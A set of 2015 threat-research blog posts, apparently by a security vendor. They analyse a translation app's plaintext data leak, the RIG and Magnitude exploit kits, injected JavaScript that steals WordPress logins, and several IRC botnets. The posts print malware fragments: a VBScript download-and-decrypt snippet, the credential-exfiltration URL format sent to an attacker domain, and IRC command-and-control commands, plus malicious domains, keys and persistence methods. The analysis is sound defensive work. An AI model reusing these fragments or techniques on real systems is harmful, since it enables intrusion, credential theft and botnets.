Tuesday, May 26, 2015

Machine Translators May Leak Confidential Information

One challenge for enterprises dealing with confidential information in conjunction with cloud-based systems is that they must exercise due diligence to ensure that it remains confidential. The steps are beyond the scope of a technical blog, but generally it involves making sure that everyone processing the confidential information understands that it is sensitive and has agreed to protect it.

For cloud services like Enterprise Resource Planning (ERP), Human Resources, Video Conferencing and so on, the confidentiality issues are very well understood, but there are exceptions like machine translation. When we think of data leaks, we rightly look primarily to malicious software (worms, viruses, customized zero-days from Advanced Persistent Threats (APT's), etc.) when seeking to prevent confidential data from leaving a network.

Machine translation tools are an interesting member of the “other” category of legitimate tools that can result in confidential data leaks without malicious intent from user or developer. Machine translation tools range from simple web sites like “youdao” pictured above or Google Translate, where it is pretty clear that information is leaving, up to integrated desktop applications, where the movement of data is not nearly as obvious.

The Youdao Dictionary application is installed like any other and operates like any other, except that the translation engine is remote and the application sends it’s lookups in plain text via insecure HTTP GET's. The fact that the translation tool is an application running on a user’s PC, makes it less likely that the person making use of it would realize that they are leaking information because the appearance is that their computer is doing the translation, not a web site.

In the above dissection of a URL retrieved by the tool, we see the word “information” being queried in the “q” field, but it could just as well be that someone isn't entirely sure what “Лечение герпеса Боба Джонса не будет хорошо” means, and would highlight it and click translate. That act results in the application enerating something similar to the plaintext query above, except with that chunk of Russian. The user will then learn that the string translates to “Bob Jones' herpes treatment is not going well.” Unfortunately, the request and the translation are transferred in plaintext form, which can be learned by passive interception.

The application that we use as an example is from Youdao (有道), a major Chinese Internet company that, according to Wikipedia (http://en.wikipedia.org/wiki/Youdao), ships an offline and free online version of their translation tool. Through some limited experimentation, Youdao's site does seem to support the same functionality over the more secure, encrypted HTTPS protocol. We have observed insecure communication in the wild for versions ranging from 2.2.16 to 5.4.43, but it would be unfair to discuss the tool without looking at the latest version. The latest version of the Youdao tool we could find, version, was downloaded from http://codown.youdao.com/cidian/static/6.3/20141203/YoudaoDict.exe and tested on a Windows 7 machine and there was no significant difference in behavior.

Our test version also makes use of plaintext (HTTP) communication by default and appears to automatically translate whatever word is near the mouse pointer, whenever it stops moving, between Chinese and English. It also has an option where a small button appears that you can click (or hover over) to translate a highlighted piece of text. Having used the program, it is easy to imagine why this tool is popular with users who need to translate between Chinese and English. In addition to the translation features, it also keeps users from being bored by providing extra advertisements.

What the tool provides in features, it definitely does not provide in security – while it works as intended and does not appear to be up to anything overtly nefarious, it still sends all the translation requests via the insecure HTTP protocol to a back-end server where the translation takes place.


The conclusion for customers is simple: translation software might send data to networks / systems outside your realm of control – if it does, then exactly as would be the case for a cloud-based ERP or Human Resources system, it is important to know where it goes, how it gets there, and that the third parties processing the information do so in a manner that is compatible with your organization's policies and contractual obligations. Given that the messages to be translated are sent in clear text, anyone on the same network could easily intercept the communication by sniffing network traffic. Translated content could range from benign phrases to highly sensitive information.

Questions to which we do not yet have answers, like whether the translation can be “paused,” if HTTPS can be enabled through configuration, if Youdao's privacy policy prevents disclosure, if any HTTPS functionality is implemented securely, etc. should be answered before deploying YoudaoDict or similar cloud-based translation tools in a confidential setting. Naturally, we would recommend to Youdao that they at least make use of HTTPS by default in future releases of their software, due to the risk of inadvertently disclosing their users' confidential information.


The following experiment was performed to verify whether traffic is still passed in plaintext HTTP GET requests, as it was in previous versions. The setup is a fake letter being written in notepad by an associate at the law firm of Nerd, Geek, and Spaz, LLP, who are defending a client who is being sued for some reason…

When the two lines were highlighted, a little blue book popped up and hovering over the book results in a translation being executed. That translation is actually performed on a remote server and the following URL is visited by the software:


For convenience, we look at the same URL after decoding it and converting to pretty-printed JSON:

    "username": null, 
    "netloc": "dict.youdao.com", 
    "vars": {
        "appZengqiang": "0", 
        "vendor": "unknown", 
        "fytype": "AUTO", 
        "keyfrom": "deskdict.screentrans.http.0.stroke", 
        "dogVersion": "1.0", 
        "pos": "-1", 
        "doctype": "xml", 
        "q": "Bill%20Jones%20is%20getting%20sued%20for%20some%20really%20embarassing%0D%0Aporn%20that%20was%20found%20on%20his%20work%20computer.%20%20Please%20advise", 
        "le": "eng", 
        "appVer": "", 
        "client": "deskdict", 
        "in": "YoudaoDict", 
        "xmlVersion": "3.2", 
        "proc": "notepad.exe", 
        "id": "8bba3b7bdf465c61b", 
        "scrfrom": "stroke"
    "fragment": "", 
    "scheme": "http", 
    "hostname": "dict.youdao.com", 
    "params": "", 
    "query": "keyfrom=deskdict.screentrans.http.0.stroke&q=Bill%20Jones%20is%20getting%20sued%20for%20some%20really%20embarassing%0D%0Aporn%20that%20was%20found%20on%20his%20work%20computer.%20%20Please%20advise&pos=-1&doctype=xml&xmlVersion=3.2&dogVersion=1.0&client=deskdict&id=8bba3b7bdf465c61b&vendor=unknown&in=YoudaoDict&appVer=", 
    "path": "/fsearch", 
    "password": null, 
    "port": null

We can see the variables broken apart more easily in the JSON version and the sentence in our screen-shot it clearly visible with “%20” replacing the spaces and “%0A%0D” replacing the end of line. When decoded, the following is the result:

Bill Jones is getting sued for some really embarassing
porn that was found on his work computer.  Please advise

This is the exact content of the highlighted region of the Notepad application. Clearly, the fact that the firm cannot spell “embarassing” correctly could put some egg on their face, making this a potentially very damaging leak. The tool also passes information about the application where the translated text came from, which is indeed “notepad.exe,” version numbers, affiliate identifiers (for companies distributing the program to presumably share in ad revenues,) and other miscellaneous information.

Wednesday, May 20, 2015

RIG Exploit Kit Infection Cycle Analysis


Happy belated birthday to RIG exploit kit! First seen around April 2014, RIG has been in the news several times over the past year. In February, the source code was reportedly leaked online, which likely spurred some of the recent changes we've observed in the kit. ThreatLabZ has been keeping an eye on RIG and in this post we'll cover an example of a full RIG infection cycle.


In the past, RIG used malvertising and compromised sites to send users to RIG landing pages and we've seen no change in this tactic. Compromised sites leading to RIG usually contain an iframe in the page header that loads a RIG proxy domain, which also contains an iframe leading to the RIG landing page. The full infection cycle is shown in the annotated Fiddler session below.

Fig 1: RIG Infection Cycle

In this example, the compromised site actually contains three different malicious iframes in its header. These iframes correspond to line items 37-39 in Fig 1.

Fig 2: iframes on Compromised Site

Out of the three RIG proxy iframes on the compromised site, only one, sunfuji[.]com, is still redirecting victims to RIG landing pages. Much like the iframe on the compromised site, the RIG proxy page contains an iframe redirecting victims to the actual landing page.

Fig 3: RIG Proxy Redirects to RIG Landing

Note that the RIG proxy is a persistent redirector, which will change the landing page location arbitrarily. Taken at a different time, the same page returned the following result:

Fig 4: RIG Proxy Changed Landing Page

Landing Page

The landing page has multiple consistent attributes, starting with the URI. Every RIG landing page URI starts with a question mark, followed by 171 characters. Two examples are below:
  • four.pavementexpress[.]org/?xH6Af7ieJRvHDIs=l3SKfPrfJxzFGMSUb-nJDa9GPkXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFT_zR3AaQ4ilotXQB5MrPzwnEqWwxWeioWBrxaIYwMU95LEQOdviwijm7VFJMonk0DRvWcDnrtMU0gbrA
  • trip.slotsbid[.]com/?xniKfredKx_HCYY=l3SKfPrfJxzFGMSUb-nJDa9GPkXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFT_zR3AaQ4ilotXQB5MrPzwnEqWwxWeioWAqBHbYw1MrcOTEOcz0Aj2yeVBd892zxWA4GMBmL5MVUgbrA
The landing page itself contains three blocks of obfuscated code along with some portions of text from a popular CNET article. The majority of the code is actually a long list of character-delimited strings that are passed to a function that basically splits them on the delimiter and runs 'fromCharCode':

Fig 5: Top of the RIG Landing Page - strings use 't' delimiter

The decode function for each of the three code blocks immediately follows the set of character-delimited strings, as shown in Fig 6.

Fig 6: Decode function for first set of character-delimited strings

The deobfuscated first block of code attempts to detect known virtual machine characteristics and other attributes that might indicate an analysis environment. If anything is found, the next two code blocks are not deobfuscated or executed.

Fig 7: Code block 1 deobfuscated - detect analysis environment

The second code block is a large base64-encoded VBScript segment:

Fig 8: Code block 2 deobfuscated - vbscript

The VBScript is executed from the following code:

 function time() {window.execScript(base64_decode(scriptvar), "VBscript");}setTimeout(time, 3001);  

Once executed, the VBScript exploits CVE-2014-6332, the so-called 'Godmode' exploit (VT detection - 4/57). AV detection tends to be particularly bad on the VBScript even though the code very closely matches the proof of concept originally publicized. There is a good writeup from TrendMicro, which delves into the details of this vulnerability. If exploitation is successful, the encrypted exe is downloaded, decrypted, and executed on the system. The encryption key for the binary is conveniently in cleartext within the VBScript:

      If objHTTP.Status = 200 Then  
           Set objFile = objFSO.CreateTextFile(strSaveTo,True)  
           objFile.Write EnDeCrypt(ByteArray2String(objHTTP.responseBody), "nkiOaWsg")  
      End If  

The third block of code simply serves up a malicious SWF with no secondary obfuscation:

Fig 9: Code block 3 deobfuscated - malicious SWF

This code is almost the same as in other exploit kits, and the URL of the encrypted binary is being passed to the SWF as a parameter. The exploit in this case was CVE-2015-0313, which affects Flash versions prior to, and the exploit code is contained in a script called 'wow.' Detection on VirusTotal shows 10/57, and there are several public writeups on this vulnerability.

Payload #1 - Injector

The binary payload is encrypted with an 8-byte key, which you can guess from the stream or retrieve from the deobfuscated VBScript.

Fig 10: Encrypted Binary - key is 'WsgnkiOa'

VirusTotal detection is a bit better than 50% for this payload at 32/57. The binary file is a Nullsoft Installer self-extracting archive and extracting the archive reveals three files inside:

Fig 11: Extracted Files from EXE

In addition to these three files, another executable 'b8.exe' is dropped. Once the installer finishes dropping files, it loads the DLL (15/55 on VirusTotal) and begins executing functions to read in the other two files. The file '6ag1rqashtwqw1hgqa' contains data XOR'd with the first 10 bytes of the filename, and the decrypted contents reveals several API calls that give us an idea of what will happen next, for example CreateProcessA, WriteProcessMemory, and ResumeThread.

Fig 12: Decrypting file data with filename

Similarly, the 'Stevie Nicks' .m3u is unfortunately not actually a playlist, but instead an encrypted binary that is decrypted by the DLL using the XOR key "ZhmGqqKwXmJiiS7dzjzPyyaTw0PANF".

Fig 13: Decrypting 'Stevie Nicks' playlist binary

VirusTotal detection on the decrypted Stevie Nicks binary is 35/56.  Ultimately, this leads to creating a hollow process of itself (process hollowing - PDF) which then creates an explorer.exe process and injects code to beacon to the Command & Control (C&C) server. Beacons were frequent and used the URI string '/power/logout.php' to POST to the domain 'starpowerss.com'

Fig 14: C&C Traffic Sample

Other notable activity includes:
  • Copying to 'C:\Program Files\Common Files\Windows Search 5.3.10\<random>.exe'
  • Using the registry for persistence
  • Hooking ZwOpenFile and ZwOpenProcess
  • Clipboard control

Payload #2 - Blue Bot

After quite some time, a second payload is downloaded named 'cfajrs.exe' from 'a.pomf.se' which beacons to Four URIs were observed:
  • /help/proxy
  • /help/blog
  • /help/botlogger.php
    • Returns div of HTML with "visitors online" (see Fig 15)
  • /help/target
    • Returns 'STOP|STOP|STOP' during analysis (see Fig 16)

Fig 15: /help/botlogger.php response

Fig 16: /help/target response

VirusTotal detection is 41/56 and indicates this is part of BlueBotnet. Looking at the binary, we see it's a .NET executable and uses no obfuscation at all to make decompilation difficult. Looking at the namespace and classes confirms this is called 'Blue_Botnet' and appears to be a DoS tool.

Fig 17: Blue_Botnet Code Overview

One of the more interesting functions is the 'updateTarget' function, which expects a pipe-delimited list of IP, port, and method. There are multiple different methods accepted for the 'target' command: UDP, TCP, SYN, MCBOTALPHA, HTTP, HTTPROXY, PRESS, and STOP.

Fig 18: Blue_Botnet updateTarget Function

To perform its attacks, the bot has a list of 37 different user agent strings to make detection more difficult (paste of user agents); each request uses a different user agent from the list so requests look like they are coming from multiple different clients instead of from the same source. There is an Italian-language theme to the code, both in some of the variable names and in some of the HTTP headers, for example the Accept-Language header in the HTTP attack function shown below.

Fig 19: Blue_Botnet HTTP Attack Function

Interestingly, the response from botlogger.php is not used in the code and the request may simply be a beacon to the server to keep count of infections.


RIG continues to be a popular and effective exploit kit choice and has evolved over the past year, indicating active development. While other exploit kits are moving toward ransomware and adfraud for monetization of infected victims, RIG is apparently not following this trend and still pushes more traditional malware. ThreatLabZ will continue to monitor RIG for any new developments. For a look at the infrastructure supporting RIG, Trustwave has a great post on the topic.

Monday, May 18, 2015

Magnitude Exploit Kit leading to Ransomware via Malvertising

Magnitude Exploit Kit is a malicious exploit package that leverages a victim’s vulnerable browser plugins in order to download a malicious payload to a system.  This technique is known as a drive-by-download attack, which is often leveraged on compromised websites and malicious advertising networks.

We recently found a number of compromised pages following the structure of fake search engine pages. The following sites have been seen to redirect to malicious content:

  • hymedoraw[dot]com/search[dot]php
  • awerdeall[dot]com/search[dot]php
  • index-html[dot]com/
  • joomla-green[dot]com/
  • bestcool-search[dot]com/
  • joyo-search[dot]com/
  • megas-search[dot]com/
  • speeds-search[dot]com/
  • sample-data[dot]com/
  • lazy-summer[dot]com/
  • tundra-search[dot]com/
  • death-tostock[dot]com/
  • adoncorst[dot]com/search[dot]php
  • demo-content[dot]com/
  • enable-bootstrap[dot]com/
  • rospecoey[dot]com/search[dot]php
  • aranfleds[dot]com
  • adoncorst[dot]com/search[dot]php
  • malpithia[dot]com/search[dot]php
  • noutademn[dot]com/search[dot]php
We've also seen a high volume of Malvertising activity leading to Magnitude Exploit Kit hosting sites. The biggest offender of this Malveritising activity is from "click2.systemaffiliate.com" operated by the ad network Sunlight Media, as seen in the list below:
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=Area+Rugs+Cleaning+hotels+for+sale+by+owner
    • b7b6o[dot]y2ff[dot]3b1f767u[dot]dc[dot]3d478d[dot]t97a2as[dot]pdf0q[dot]zf1[dot]eaq6907579[dot]hatentries[dot]in/?17657271747b7e747c2539646e6463727a7671717e7b7e7663723974787a
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=backhoes+for+sale+Granite+Counter+Tops
    • nd4e61i[dot]0fedz[dot]i9390[dot]11f[dot]b8e0[dot]c1i[dot]51aa8a5x[dot]b22n[dot]z1037n6z[dot]rulesreturning[dot]in/?3f4d5a595c53565c540d114c464c4b5a525e59595653565e4b5a115c5052
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=direct+tv+dallas+tx+financial+services+companies
    • kfb39c[dot]ec526[dot]k149t[dot]13f44d[dot]gfb9820[dot]q5c[dot]c778eg[dot]c47b0v3diz2[dot]backedmisuse[dot]in/?1567707376797c767e273b666c666170787473737c797c7461703b767a78
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=business+processes+management+Metaire+Construction+Management+Service
    • a19602cr[dot]773a9be[dot]bd407edi[dot]m602f890[dot]wfd6b[dot]eay836h7h[dot]bytessounds[dot]in/?3a485f5c595653595108144943494e5f575b5c5c5356535b4e5f14595557
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=michelin+tire+Shingle+Roofer
    • 0eeda91z[dot]w8cb575d[dot]b8[dot]s247[dot]maf35794i[dot]q9b[dot]yc79p[dot]b[dot]y7siiy61xy[dot]bytessounds[dot]in/?295b4c4f4a45404a421b075a505a5d4c44484f4f404540485d4c074a4644
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=compact+suv+internet+hosting+company
    • u0b49r[dot]b9l[dot]r76783b2i[dot]ce01s[dot]k25o[dot]8f3t[dot]w32[dot]1d1dl[dot]u63g[dot]s45t[dot]xk6z4x0ok4[dot]isessentially[dot]in/?3f4d5a595c53565c540d114c464c4b5a525e59595653565e4b5a115c5052
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=hotel+prices+Air+Duct+Cleaning+Service
    • za46[dot]1375623[dot]e53cb4[dot]2014[dot]50ebd[dot]t1c06f[dot]61[dot]y7f8vkub0[dot]safelyinstall[dot]in/?16647370757a7f757d2438656f6562737b7770707f7a7f7762733875797b
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=supercuts+coupons+sales+presentation+equipment
    • 01e717[dot]i06917c[dot]36f5[dot]j056[dot]m66a[dot]176f3f[dot]5ej[dot]p6e[dot]h2xb793w17[dot]safelyinstall[dot]in/?285a4d4e4b44414b431a065b515b5c4d45494e4e414441495c4d064b4745
  • click2.systemaffiliate[dot]com/filter/?keyword=free+latest+accounting+software+Laptops
    • of62b8a[dot]x43f292x[dot]a674q[dot]r5ec03a[dot]y01c9b[dot]f7367u[dot]cgh63008[dot]husbandhides[dot]in/?3f4d5a595c53565c540d114c464c4b5a525e59595653565e4b5a115c5052
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=marine+equipment+and+supply+company+real+esate+hotline
    •  g1812c47[dot]t6060f09l[dot]t74711a[dot]m69131[dot]l88[dot]z874f0h[dot]b88z8j4s31ji[dot]husbandhides[dot]in/?2b594e4d484742484019055852585f4e464a4d4d4247424a5f4e05484446
The Malvertising networks lead to redirector domains utilizing 302 cushioning. Our recent data shows the following redirector domains to have been heavily utilized:

  • paypal-invest[.]net
  • paypal-invest[.]info
  • paypal-invest[.]biz

Following the 302 redirect, Magnitude delivers both a malicious Flash payload as well as a highly obfuscated JavaScript payload (MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow exploit). Once the browser has been exploited, Magnitude proceeds to a new step in the infection cycle where the malware payload would normally be downloaded immediately following exploitation, we are now seeing a shellcode payload being served.

Shellcode being served

The shellcode is a simple payload that utilizes the Windows library ‘urlmon.dll’ to attempt to fetch a list of URLs contained within the shellcode. In the cases we have seen so far, only the first URL results in a payload (CryptoWall 3.0), while the others return no data.

CryptoWall payload download

This is a highly profitable ransomware payload that leverages Bitcoin transactions executed over the Tor Anonymizer to monetize the attack. Threat Actors utilize this method of collection because it can't be reliably traced back to the them. Victims are especially vulnerable to this type of extortion since very few people seem to backup their critical files such as documents and pictures.

CryptoWall decryption instruction

ThreatLabZ has been actively monitoring this Magnitude EK activity and the image below illustrates the transactions we saw for this campaign:

The Green represents Payload activity; The Blue represents Landing Page activity.

As with most threat actors, once they find a location that allows them to host their attacks they tend to stick with it. The lion's share of target IPs seen from our research show that Germany is the biggest hosting location for this activity.

Other countries seen to host this activity: NL (3%) US(2%) JP(2%)

Exploit Kits are evolving to bypass standard security solutions that utilize basic URL filtering techniques. Attackers are utilizing various methods of infection, including malvertising and iFrame injection on compromised pages. Ransomware is a highly profitable, recording up to $33,000 per day at one point. The sophistication of these attacks are on the rise and security leaders need to keep apprised of this maturing illegal market.

Analysis done by Edward Miles & Chris Mannon

Thursday, May 7, 2015

Compromised WordPress sites leaking credentials

Zscaler recently observed a credentials leak campaign on multiple WordPress sites. The compromised sites run backdoor code, which activates when the user submits login credentials. The credentials are encoded and sent to an attacker website in the form of a GET request. Till now, we have identified only one domain "conyouse.com" which is collecting all the credentials from these compromised sites.

The following is a sample list of WordPress websites compromised through this campaign:
  •  shoneekapoor.com
  •  dwaynefrancis.com
  •  blissfields.co.uk
  •  avalineholding.com
  •  attherighttime.net
  •  bolsaemprego.ne
  •  capitaltrill.com
  •  blowdrybar.es
  •  espada.co.uk
  •  technograte.com
  •  socalhistory.org
  •  blissfields.co.uk
  •  glasgowcontemporarychoir.com
  •  sombornefp.co.uk
  •  reciclaconloscincosentidos.com
  •  testrmb.com
  •  digivelum.com
  •  laflordelys.com

Credential Leakage

When unsuspecting users attempt to login to one of the compromised WordPress sites, they are served injected JavaScript code as part of the login page. Below, we walk through the full exploit cycle illustrating how the user credentials are being stolen through this campaign.

Compromised WordPress login page

As part of the WordPress login page, the user is getting served malicious information stealing JavaScript code hosted on “conyouse[.]com”. The obfuscated JavaScript code present in “wp.js” file can be seen here:
Information stealing JavaScript code

The variable “_0xdd75” stores a list of strings which are used dynamically in the JavaScript above.

List of encoded strings
This code is triggered when the user submits their credentials on the login page of the WordPress site.
The form containing the username and password input box has a fixed name as “loginform” in all WordPress sites. The preventDefault event method is used to cancel the submit event for “loginform” entity and execute the alternate code which is present in this file. The login credential string is serialised and encoded in a Base64 format.

Information Stealing JavaScript code

The final data is sent to "conyouse[.]com/scr.js", which is statically stored as one of the strings. The final GET request generated is as shown in the traffic:

GET Request relaying stolen credentials

On decoding the encoded string highlighted above we see that it’s relaying the stolen user credentials using the GET request. The format of this GET request is

"www.conyouse[.]com/scr.js?callback=jQuery<random number>&data=<BASE64_ENCODED_CREDENTIALS>&_=<random number>"

Base64 decoded data string

The complete sequence of action captured is shown in below screenshot.

Complete exploit cycle
The end user is oblivious to the fact that the credentials were leaked to a remote attacker's site as he is redirected to a successful logged in session of WordPress site.

WordPress, being one of the most popular Content Management Systems & Blogging platform, remains an attractive target for cybercriminals due to it's large user base. While the initial vector behind the compromise of the sites listed in this blog is unclear, it is extremely important for the site administrators to keep their WordPress sites patched with latest security updates.

Analysis by - Sameer Patil & Deepen Desai

Thursday, April 23, 2015

IRC Botnets alive, effective & evolving

An IRC Botnet is a collection of machines infected with malware that can be controlled remotely via an IRC channel. It usually involves a Botnet operator controlling the IRC bots through a previously configured IRC server & channel. The Botnet operator, after appropriate checks, periodically moves the IRC bot to a new IRC channel to thwart researchers & automated sandboxes from monitoring the commands.

In this blog, we will look at one of the most prevalent IRC based malware families - DorkBot, followed by three additional IRC Botnet families - RageBot, Phorpiex, and IRCBot.HI.

DorkBot Installer
In our telemetry data from last 3 months we have seen following URL serving the DorkBot installer:
api1[.]wipmania[.]com[.]wipmsc[.]ru/api1[.]gif  (Check APPENDIX section for additional info.)
The malware executable checks for two command line arguments
  • "-aav_start"  - It terminates
  • "–shell"  - It starts the infection cycle, creates a registry key "Windows Update" to ensure persistence, and creates a mutex named Windows_Shared_Mutex_231_c000900 to ensure only one copy of Dorkbot is running
If no command line argument is provided, it starts injecting threads into other processes without performing the above mentioned actions. 

It first injects a thread into svchost.exe and performs the following actions:
  1. Copy itself as "%APPDATA% \Update\Explorer.exe" on the infected system.
  2. Creates a Run registry key with the name of "Windows Explorer Manager" for the dropped executable copy.
  3. It creates a thread that monitors the Run key created in step 2 & recreates it if missing, every 10,000 seconds.
  4. It also creates a thread that copies the file created in step 1 to file name “\c731200” in the "%APPDATA%” folder.
  5. It then creates a remote thread in mspaint.exe that tries to resolve a predetermined list of domains as shown in image below:
DorkBot - Hardcoded Domains
The main Dorkbot binary (MD5-E7E48AD1A2A57CC94B56965AA8B476DA) was found embedded in the resource section which is extracted and executed at runtime.

DorkBot - memory strings
It also creates a remote thread in the “calc.exe” process that performs the following actions:
  1. Creates a mutex with the name “c731200
  2. Checks for Internet connectivity using API InternetCheckConnection with www.google.com as the URL.
  3. It then tries to download files from 20 different URLs and saves the downloaded file with random file names in the %Temp% folder. File names are shown in the screenshot below:
DorkBot- Random file names
All the URLs are hardcoded in the DorkBot and are encrypted via a custom encryption method.
DorkBot - Encrypted URLs
DorkBot - Pseudocode of decryption function

Below is the full list of URLs from from where it tries to download additional malware:


Dorkbot represents a family of information stealing worms that uses IRC based Command & Control (C&C) server communication. Dorkbot is also known as ngrBot due to it's similar feature set. It is one of the most powerful IRC based botnets that generates revenue for the botnet operator via the following features:
  • Capable of spreading via chat messengers, USB drives, & social networking sites
  • Supports multiple Distributed Denial of Service (DDoS) attack types
  • Capable of stealing login credentials for multiple HTTP and FTP sites
  • Blocks security update related websites to evade detection
  • Capable of downloading, installing and uninstalling other malware payloads
RageBot, Phorpiex, and IRCBot.HI Analysis –
From our 3 months telemetry data, we have seen the following URLs serving these IRC bots–

Malware Name

In addition to IRC based C&C communication, all these bots have following similarity in their operation:

1. Checks execution environment - Virtual Environment, Honeypot or Sandbox

RageBot - Check via Username
As seen in the screenshot above, Ragebot is checking for common usernames found in certain public sandboxing environments before executing further.

Phorpiex - Check via DLL name
Phorpiex bot looks for strings like 'qemu', 'virtual', and 'vmware' in system registry to check for execution in Virtual Environment. In addition, it also checks for the presence of Sandboxie sandbox environment by looking for specific DLLs as seen in the screenshot above.

IRCBot.HI - Check via DLL & Product IDs
It is important to note that IRCBot.HI checks the ProductID value from the registry against multiple hardcoded ProductID values. It terminates execution if any of them matches. We believe that these hardcoded ProductIDs were harvested from various online public sandboxes.

2. Creates Mutex
RageBot – It creates a mutex with name “ie”

RageBot - Mutex
           Phorpiex – It creates a mutex with name “t2”, We have also seen some Phorpiex samples which were creating mutexes with name “t3” and “t4”. 
Phorpiex - Mutex
          IRCBot.HI – During installation it creates a mutex with the name MAIN_<RandomNumber>. When it runs from the installation path, it creates a mutex with the name BACKUP_<RandomNumber> 

IRCBot.HI - Mutex
3. Installation

RageBot- It installs itself in “%ProgramFiles%\Common Files\System” or “C:\DOCUME~1\” directory. The malware uses ragebot.exe as file name for the dropped file.
RageBot – Building installation path
If it is not able to create the file at the above mentioned locations then it tries to install itself in “C:\RECYCLER” directory.

Phorpiex – It installs itself into %WINDIR% , %USERPROFILE% , %APPDATA% and %TEMP% locations by creating a folder “M-50504578520758924620” containing a file named winmgr.exe.
Phorpiex – Pseudocode of Installations function 
It then deletes itself after installation by running a batch file dropped in the %TEMP% folder.

IRCBot.HI – During our analysis it installed itself into %WINDIR% and %USERPROFILE%. In %WINDIR%, it creates a folder named 1756410959 and drops copy of itself as lsass.exe. In %USERPROFILE%, it drops copy of itself as ctfmon.exe. 

IRCBot.HI – Installing in different locations

4. Adding autostart feature using Run registry key.

RageBot – Creates Run Key -         HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run and key name as – “Windows Update”

Phorpiex – Creates Run Key - HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run and key name as – “Microsoft Windows Manager”

IRCBot.HI – Creates Run Once Key - HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce and key name as – “*<RandomNumber>”
IRCBot.Hi – RunOnce Entry
5. Adding itself to Windows Firewall trusted application list 
All these bots add themselves to the Windows Firewall’s exception list by modifying the key
6. Propagation method 

RageBot – 
  1. It copies itself to the following P2P & Instant messenger application folders for spreading  
    • \Program Files\LimeWire\Shared
    • \Program Files\eDonkey2000\incoming
    • \Program Files\KAZAA
    • \Program Files\Morpheus\My Shared Folder\
    • \Program Files\BearShare\Shared\
    • \Program Files\ICQ\Shared Files\
    • \Program Files\Grokster\My Grokster\
    • \My Downloads\
  2. It also searches for RAR files and copies itself inside them.
Phorpiex –

    A. Creates a shortcut in a removable device
  • It checks for all removable devices
  • Copies itself with a different name
  • Creates a shortcut to an already present folder and sets the path of a shortcut to run the malicious file
  • Hides the malicious file and folder by setting a hidden attribute for both
Phorpiex - Creating Shortcuts

    B. Creates an autorun.inf file in removable devices to autorun the malicious file
  • Checks for all removable devices.
  • Copies itself with a name of windrv.exe
  • Creates an autorun.inf file to autorun the malicious file
Phorpiex - Creating autorun.inf file
IRCBot.HI - 
We identified strings related to Skype in memory during our analysis that would suggest this bot is capable of spreading via Skype. 
IRCBot.HI - Skype inject related string
7. IRC based Command & Control communication
All these bots use the IRC protocol for C&C communication. Bots perform different actions based on the commands received from the remote C&C server.

RageBot – During our analysis, this RageBot sample was trying to connect to vnc.e-qacs[.]com on port 6668. Upon successful connection, the following initial communication was observed:
RageBot - C&C Communication
You can find full list of C&C commands in the appendix section.
Phorpiex – It tries to connect to trksrv[.]su on port 5050. Some other IRC servers it tries to connect to are - trik[.]su , srv50[.]ru and trkbox[.]ru. Upon successful connection, it sends the following IRC commands:
                                      NICK `|USA|hihdlxu
                                      USER x "" "x" :x

Some other commands:

                              001 -> Sends JOIN #b message to server
                              PING -> Checks status
                              .j <channel name> - > Join given channel
                              bye -> Uninstall bot

Phorpiex - C&C Communication
IRCBot.HI - It tries to connect to irc[.]ernsthaft[.]su or irc[.]ded-rrwqwzjzjris[.]com on port 6667. 
Upon successful connection, it sends the following IRC commands:

                                     PASS ddos
                                     USER <8 char string> <1 digit number> * :<8 char string>
                                     NICK n[USA|A|D|<OS_NAME><OS_TYPE>|1c]<8 char string>
                                     JOIN #PlanB

Below is a sample of the C&C communication for this bot:

IRCBot.HI - C&C Communication
In this era of sophisticated Botnets with multiple C&C communication channels, custom protocols, and encrypted communication; we continue to see a steady number of new IRC based Botnet payloads being pushed out in the wild on a regular basis. As we saw in our analysis, IRC based Botnet families continue to evolve in terms of sophisticated features incorporated in the bots.

ThreatLabZ is actively monitoring this threat and ensuring signature coverage for Zscaler customers.


DorkBot installer URLs and MD5

Jan-15 E49B3EF80FF4DB4DB1D5220930EC7DAD api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 CC9D72663D2495779B0C81AEE34592E7 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 A98472BCAA010433A80410C3483C90E1 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 EEFC72EFFD96FFD11EC2D69CD6248AC5 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 4E7149C1401F5A0BC34E3AAD6070F4BE api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 5B14C029570F40BDDC73669FE4EFEFB0 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 4C54D366B04F9980F038CB6FC62603D0 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 6E4282023D6A19B27C30DB5D54CEE32C api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 E7B61B2BE23167965079468DF36497EF api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 DC8CBA3F91A34F0D1EFA79BE4495B305 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 8AAD291926335F28B4402830252556F7 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 8036A36C372602CFA049996B9F5BD6AE api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 8036A36C372602CFA049996B9F5BD6AE api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 7257FD6F90B5AA9BB249EA74B764A401 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
Jan-15 B186525826856E881E879C6C44BB2452 api1[.]wipmania[.]com[.]wipmsc[.]ru/api1.gif
